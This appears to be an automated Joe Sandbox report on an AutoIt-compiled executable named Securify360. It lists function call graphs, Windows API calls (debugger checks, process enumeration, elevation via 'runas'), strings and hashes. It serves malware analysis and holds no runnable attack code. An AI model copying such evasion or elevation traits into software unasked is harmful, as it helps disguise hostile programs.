100532 fb3553 100530->100532 100536 fb9fa5 LeaveCriticalSection 100531->100536 100532->100519 100534 fb9fa5 LeaveCriticalSection 100532->100534 100534->100522 100535->100529 100536->100532 100537 f96981 100544 f9373a 100537->100544 100539 f96997 100553 f97b3f 100539->100553 100541 f969bf 100542 f9584d 100541->100542 100565 ffa48d 89 API calls 4 library calls 100541->100565 100545 f93758 100544->100545 100546 f93746 100544->100546 100547 f9375e 100545->100547 100548 f93787 100545->100548 100566 f9523c 59 API calls 100546->100566 100550 fb0fe6 Mailbox 59 API calls 100547->100550 100567 f9523c 59 API calls 100548->100567 100552 f93750 100550->100552 100552->100539 100554 fa162d 59 API calls 100553->100554 100555 f97b64 _wcscmp 100554->100555 100556 fa1a36 59 API calls 100555->100556 100558 f97b98 Mailbox 100555->100558 100557 fcffad 100556->100557 100568 fa17e0 59 API calls Mailbox 100557->100568 100558->100541 100560 fcffb8 100569 f93938 68 API calls 100560->100569 100562 fcffc9 100564 fcffcd Mailbox 100562->100564 100570 f9523c 59 API calls 100562->100570 100564->100541 100565->100542 100566->100552 100567->100552 100568->100560 100569->100562 100570->100564 100571 fa4d83 100572 fa4dba 100571->100572 100573 fa4dd8 100572->100573 100574 fa4e37 100572->100574 100611 fa4e35 100572->100611 100575 fa4ead PostQuitMessage 100573->100575 100576 fa4de5 100573->100576 100578 fa4e3d 100574->100578 100579 fe09c2 100574->100579 100603 fa4e28 100575->100603 100580 fa4df0 100576->100580 100581 fe0a35 100576->100581 100577 fa4e1a DefWindowProcW 100577->100603 100583 fa4e42 100578->100583 100584 fa4e65 SetTimer RegisterWindowMessageW 100578->100584 100582 f9c460 10 API calls 100579->100582 100585 fa4df8 100580->100585 100586 fa4eb7 100580->100586 100626 ff2cce 97 API calls _memset 100581->100626 100589 fe09e9 100582->100589 100590 fa4e49 KillTimer 100583->100590 100591 fe0965 100583->100591 100587 fa4e8e CreatePopupMenu I_RpcFreeBuffer 100584->100587 100584->100603 100592 fe0a1a 100585->100592 100593 fa4e03 100585->100593 100616 fa5b29 100586->100616 100594 fa4e9b 100587->100594 100596 f9c483 266 API calls 100589->100596 100600 fa5ac3 Shell_NotifyIconW 100590->100600 100598 fe099e MoveWindow 100591->100598 100599 fe096a 100591->100599 100592->100577 100625 fe8854 59 API calls Mailbox 100592->100625 100593->100594 100601 fa4e0e 100593->100601 100624 fa5bd7 107 API calls _memset 100594->100624 100595 fe0a47 100595->100577 100595->100603 100596->100601 100598->100603 100604 fe096e 100599->100604 100605 fe098d SetFocus 100599->100605 100606 fa4e5c 100600->100606 100601->100577 100613 fa5ac3 Shell_NotifyIconW 100601->100613 100604->100601 100610 fe0977 100604->100610 100605->100603 100623 f934e4 DeleteObject DestroyWindow Mailbox 100606->100623 100609 fa4eab 100609->100603 100612 f9c460 10 API calls 100610->100612 100611->100577 100612->100603 100614 fe0a0e 100613->100614 100615 fa59d3 94 API calls 100614->100615 100615->100611 100617 fa5bc2 100616->100617 100618 fa5b40 _memset 100616->100618 100617->100603 100619 fa56f8 87 API calls 100618->100619 100621 fa5b67 100619->100621 100620 fa5bab KillTimer SetTimer 100620->100617 100621->100620 100622 fe0d6e Shell_NotifyIconW 100621->100622 100622->100620 100623->100603 100624->100609 100625->100611 100626->100595 100627 f91066 100632 f9aaaa 100627->100632 100629 f9106c 100630 fb2f70 __cinit 67 API calls 100629->100630 100631 f91076 100630->100631 100633 f9aacb 100632->100633 100664 fb02eb 100633->100664 100637 f9ab12 100638 fa1207 59 API calls 100637->100638 100639 f9ab1c 100638->100639 100640 fa1207 59 API calls 100639->100640 100641 f9ab26 100640->100641 100642 fa1207 59 API calls 100641->100642 100643 f9ab30 100642->100643 100644 fa1207 59 API calls 100643->100644 100645 f9ab6e 100644->100645 100646 fa1207 59 API calls 100645->100646 100647 f9ac39 100646->100647 100674 fb0588 100647->100674 100651 f9ac6b 100652 fa1207 59 API calls 100651->100652 100653 f9ac75 100652->100653 100702 fafe2b 100653->100702 100655 f9acbc 100656 f9accc GetStdHandle 100655->100656 100657 f9ad18 100656->100657 100658 fd2f39 100656->100658 100659 f9ad20 OleInitialize 100657->100659 100658->100657 100709 ff70f3 100658->100709 100659->100629 100661 fd2f49 100715 ff77c2 100661->100715 100718 fb03c4 100664->100718 100667 fb03c4 59 API calls 100668 fb032d 100667->100668 100669 fa1207 59 API calls 100668->100669 100670 fb0339 100669->100670 100671 fa1821 59 API calls 100670->100671 100672 f9aad1 100671->100672 100673 fb07bb 6 API calls 100672->100673 100673->100637 100675 fa1207 59 API calls 100674->100675 100676 fb0598 100675->100676 100677 fa1207 59 API calls 100676->100677 100678 fb05a0 100677->100678 100725 fa10c3 100678->100725 100681 fa10c3 59 API calls 100682 fb05b0 100681->100682 100683 fa1207 59 API calls 100682->100683 100684 fb05bb 100683->100684 100685 fb0fe6 Mailbox 59 API calls 100684->100685 100686 f9ac43 100685->100686 100687 faff4c 100686->100687 100688 faff5a 100687->100688 100689 fa1207 59 API calls 100688->100689 100690 faff65 100689->100690 100691 fa1207 59 API calls 100690->100691 100692 faff70 100691->100692 100693 fa1207 59 API calls 100692->100693 100694 faff7b 100693->100694 100695 fa1207 59 API calls 100694->100695 100696 faff86 100695->100696 100697 fa10c3 59 API calls 100696->100697 100698 faff91 100697->100698 100699 fb0fe6 Mailbox 59 API calls 100698->100699 100700 faff98 RegisterWindowMessageW 100699->100700 100700->100651 100703 fafe3b 100702->100703 100704 fe620c 100702->100704 100706 fb0fe6 Mailbox 59 API calls 100703->100706 100728 ffa12a 59 API calls 100704->100728 100708 fafe43 100706->100708 100707 fe6217 100708->100655 100710 fb0fe6 Mailbox 59 API calls 100709->100710 100711 ff70fd 100710->100711 100712 ff710c 100711->100712 100729 ff6fda InitializeCriticalSectionAndSpinCount 100711->100729 100712->100661 100714 ff710a 100714->100661 100716 fd2f55 CloseHandle 100715->100716 100717 ff77d0 CreateThread 100715->100717 100716->100659 100717->100716 100735 ff77a8 100717->100735 100719 fa1207 59 API calls 100718->100719 100720 fb03cf 100719->100720 100721 fa1207 59 API calls 100720->100721 100722 fb03d7 100721->100722 100723 fa1207 59 API calls 100722->100723 100724 fb0323 100723->100724 100724->100667 100726 fa1207 59 API calls 100725->100726 100727 fa10cb 100726->100727 100727->100681 100728->100707 100732 ff7221 100729->100732 100733 ff722f GetCurrentProcess GetCurrentProcess DuplicateHandle 100732->100733 100734 ff7016 InterlockedExchange 100732->100734 100733->100734 100734->100714 100736 ff77b2 100735->100736 100738 ff77b7 100735->100738 100739 ff7681 InterlockedExchange 100736->100739 100740 fb0fe6 Mailbox 59 API calls 100739->100740 100741 ff76a8 100740->100741 100742 fb0fe6 Mailbox 59 API calls 100741->100742 100743 ff76bb ReadFile 100742->100743 100744 ff76dd 100743->100744 100745 ff7788 100743->100745 100744->100745 100746 ff76e7 EnterCriticalSection 100744->100746 100748 ff770f _memmove 100744->100748 100747 ff7791 InterlockedExchange 100745->100747 100746->100744 100746->100748 100747->100738 100749 ff775b LeaveCriticalSection ReadFile 100748->100749 100750 fb0fe6 Mailbox 59 API calls 100748->100750 100749->100744 100749->100745 100750->100748 100751 fce463 100752 f9373a 59 API calls 100751->100752 100753 fce479 100752->100753 100754 fce48f 100753->100754 100755 fce4fa 100753->100755 100763 f95376 60 API calls 100754->100763 100757 f9b020 266 API calls 100755->100757 100762 fce4ee Mailbox 100757->100762 100759 fce4ce 100759->100762 100764 ff890a 59 API calls Mailbox 100759->100764 100760 fcf046 Mailbox 100762->100760 100765 ffa48d 89 API calls 4 library calls 100762->100765 100763->100759 100764->100762 100765->100760
                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FA526C
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00FA527E
                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00FA52E6
                                                                                                • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                                                                • Part of subcall function 00F9BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F9BC07
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA5366
                                                                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00FE0B2E
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00FE0B66
                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01046D10), ref: 00FE0BE9
                                                                                              • ShellExecuteW.SHELL32(00000000), ref: 00FE0BF0
                                                                                                • Part of subcall function 00FA514C: GetSysColorBrush.USER32(0000000F), ref: 00FA5156
                                                                                                • Part of subcall function 00FA514C: LoadCursorW.USER32(00000000,00007F00), ref: 00FA5165
                                                                                                • Part of subcall function 00FA514C: LoadIconW.USER32(00000063), ref: 00FA517C
                                                                                                • Part of subcall function 00FA514C: LoadIconW.USER32(000000A4), ref: 00FA518E
                                                                                                • Part of subcall function 00FA514C: LoadIconW.USER32(000000A2), ref: 00FA51A0
                                                                                                • Part of subcall function 00FA514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA51C6
                                                                                                • Part of subcall function 00FA514C: RegisterClassExW.USER32(?), ref: 00FA521C
                                                                                                • Part of subcall function 00FA50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA5109
                                                                                                • Part of subcall function 00FA50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA512A
                                                                                                • Part of subcall function 00FA50DB: ShowWindow.USER32(00000000), ref: 00FA513E
                                                                                                • Part of subcall function 00FA50DB: ShowWindow.USER32(00000000), ref: 00FA5147
                                                                                                • Part of subcall function 00FA59D3: _memset.LIBCMT ref: 00FA59F9
                                                                                                • Part of subcall function 00FA59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA5A9E
                                                                                              Strings
                                                                                              • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00FE0B28
                                                                                              • AutoIt, xrefs: 00FE0B23
                                                                                              • runas, xrefs: 00FE0BE4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                              • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                              • API String ID: 529118366-2030392706
                                                                                              • Opcode ID: 075f2c9e0b7141af563ee5ff4fbda761e947b08184726ff23b8f48445d3e9cbc
                                                                                              • Instruction ID: 55f17c3f8225d685d0623abaff85982dc92043b5ad5bbe246cc96d1b41b84df0
                                                                                              • Opcode Fuzzy Hash: 075f2c9e0b7141af563ee5ff4fbda761e947b08184726ff23b8f48445d3e9cbc
                                                                                              • Instruction Fuzzy Hash: 015115B1D00348AADF21ABB0DC42EFF7B79BF86790F104069F891A6146CABD4544FB21
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00FA5D40
                                                                                                • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                                                              • GetCurrentProcess.KERNEL32(?,01020A18,00000000,00000000,?), ref: 00FA5E07
                                                                                              • IsWow64Process.KERNEL32(00000000), ref: 00FA5E0E
                                                                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00FA5E54
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00FA5E5F
                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00FA5E90
                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00FA5E9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 1986165174-0
                                                                                              • Opcode ID: e82a79d94042335850569cd73d27ca9b475a63697a30e9ead17223bf9fe4e05a
                                                                                              • Instruction ID: 4251bb5b9bc26fe69c7428f356c875b0883c377201c38de37c5e5110490051c0
                                                                                              • Opcode Fuzzy Hash: e82a79d94042335850569cd73d27ca9b475a63697a30e9ead17223bf9fe4e05a
                                                                                              • Instruction Fuzzy Hash: BC91F771989BC0DEC731CB7584905ABFFE5AF3A310B980A5ED0C793A01D234A548E759
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00FF416D
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00FF417B
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00FF419B
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00FF4245
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 420147892-0
                                                                                              • Opcode ID: d7f297f89a012e09664face9c5ad0ebc4980139fff51072795c9083a01808906
                                                                                              • Instruction ID: d4f5eece3b14fca1b2b5b17607fa2f44125c8cdd7b28cef5e4ce0f77b4162385
                                                                                              • Opcode Fuzzy Hash: d7f297f89a012e09664face9c5ad0ebc4980139fff51072795c9083a01808906
                                                                                              • Instruction Fuzzy Hash: 9C318BB11083459BD310EF50D885ABFBBE8BF96350F10092DF685821A1EB65AA49DB92
                                                                                              APIs
                                                                                                • Part of subcall function 00FA3740: CharUpperBuffW.USER32(?,010571DC,00000001,?,00000000,010571DC,?,00F953A5,?,?,?,?), ref: 00FA375D
                                                                                              • _memmove.LIBCMT ref: 00F9B68A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2819905725-0
                                                                                              • Opcode ID: 153669053d40246aea3cff0fd2254576bf1dc3259211ee4542a81b4ad53e124f
                                                                                              • Instruction ID: 280e2bd7098762663d0045adcb28a8ac0b7f8107a32b1e776eb575d91040db94
                                                                                              • Opcode Fuzzy Hash: 153669053d40246aea3cff0fd2254576bf1dc3259211ee4542a81b4ad53e124f
                                                                                              • Instruction Fuzzy Hash: 2CA28A71A08341CFEB20CF14D580B2AB7E1BF84314F18895EE99A8B361D775ED45EB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3598de3012a10226913ec3f96d283eaebda8b1a1ee14a2a9eee1e7485759f458
                                                                                              • Instruction ID: b2365b3ec33d7641976008411c39a0b7f436d66fa9286c2fdadec461f60dadc4
                                                                                              • Opcode Fuzzy Hash: 3598de3012a10226913ec3f96d283eaebda8b1a1ee14a2a9eee1e7485759f458
                                                                                              • Instruction Fuzzy Hash: CC22BE71E082058FEF24DF58C880BAEB7B1FF55310F19816EE8569B341D7B4A981EB91
                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 00F9BF57
                                                                                                • Part of subcall function 00F952B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F952E6
                                                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00FD36B5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePeekSleepTimetime
                                                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                              • API String ID: 1792118007-922114024
                                                                                              • Opcode ID: 4922ef74b5803ad4bccb4f37a2147fab3115ff270aba0f378f6db5ad1911a2f4
                                                                                              • Instruction ID: 3f0a589f66c7642bb1054bf226b0f0b248b2121c9cfe7500762cc34612f88fb4
                                                                                              • Opcode Fuzzy Hash: 4922ef74b5803ad4bccb4f37a2147fab3115ff270aba0f378f6db5ad1911a2f4
                                                                                              • Instruction Fuzzy Hash: 2AC2C370A08341DFDB24DF24C844BAAB7E5BF84314F18491EF58A97391CB75E944EB82
                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00F93444
                                                                                              • RegisterClassExW.USER32(00000030), ref: 00F9346E
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F9347F
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00F9349C
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F934AC
                                                                                              • LoadIconW.USER32(000000A9), ref: 00F934C2
                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F934D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: acebf4e03c359771a769b3143fe03624334c59122e4ea99a94bb76f218a5144e
                                                                                              • Instruction ID: 63b4d7d2747f57a1f07bfd849a7b8c9069672f8fe3b2177ef010c85590b01409
                                                                                              • Opcode Fuzzy Hash: acebf4e03c359771a769b3143fe03624334c59122e4ea99a94bb76f218a5144e
                                                                                              • Instruction Fuzzy Hash: B7314A71D41309EFEB608FA4D889ADABBF0FF09310F10416AF590E6284E7BA0545DF51
                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00F93444
                                                                                              • RegisterClassExW.USER32(00000030), ref: 00F9346E
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F9347F
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00F9349C
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F934AC
                                                                                              • LoadIconW.USER32(000000A9), ref: 00F934C2
                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F934D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: 93795bd3a372b633b936f3b469ccc5a05fa93fa8212bb45f518a40c8b13be45e
                                                                                              • Instruction ID: bc04734f05061360748f4d81c86a1c3742dd03cedec88207ab58cce29661a6af
                                                                                              • Opcode Fuzzy Hash: 93795bd3a372b633b936f3b469ccc5a05fa93fa8212bb45f518a40c8b13be45e
                                                                                              • Instruction Fuzzy Hash: 2D212EB1D41319AFEB20DF94E888BDEBBF4FB08700F50411AF594A6288D7BA0544DF91
                                                                                              APIs
                                                                                                • Part of subcall function 00FB00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00FA3094), ref: 00FB00ED
                                                                                                • Part of subcall function 00FB08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FA309F), ref: 00FB08E3
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FA30E2
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FE01BA
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FE01FB
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00FE0239
                                                                                              • _wcscat.LIBCMT ref: 00FE0292
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                              • API String ID: 2673923337-2727554177
                                                                                              • Opcode ID: 70828d9dfe51cfb18dbf6782371cc9990a97f9dac9ac7e211fccd3c4466722bf
                                                                                              • Instruction ID: 3683db2f72c533ef53dcbe390c21577f968e503492e280ad01709001cb616a3f
                                                                                              • Opcode Fuzzy Hash: 70828d9dfe51cfb18dbf6782371cc9990a97f9dac9ac7e211fccd3c4466722bf
                                                                                              • Instruction Fuzzy Hash: F971B2715093019EC324EF66DC819ABBBE8FF85390F40852EF885C71A4EB799944DB52
                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00FA5156
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00FA5165
                                                                                              • LoadIconW.USER32(00000063), ref: 00FA517C
                                                                                              • LoadIconW.USER32(000000A4), ref: 00FA518E
                                                                                              • LoadIconW.USER32(000000A2), ref: 00FA51A0
                                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA51C6
                                                                                              • RegisterClassExW.USER32(?), ref: 00FA521C
                                                                                                • Part of subcall function 00F93411: GetSysColorBrush.USER32(0000000F), ref: 00F93444
                                                                                                • Part of subcall function 00F93411: RegisterClassExW.USER32(00000030), ref: 00F9346E
                                                                                                • Part of subcall function 00F93411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F9347F
                                                                                                • Part of subcall function 00F93411: InitCommonControlsEx.COMCTL32(?), ref: 00F9349C
                                                                                                • Part of subcall function 00F93411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F934AC
                                                                                                • Part of subcall function 00F93411: LoadIconW.USER32(000000A9), ref: 00F934C2
                                                                                                • Part of subcall function 00F93411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F934D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
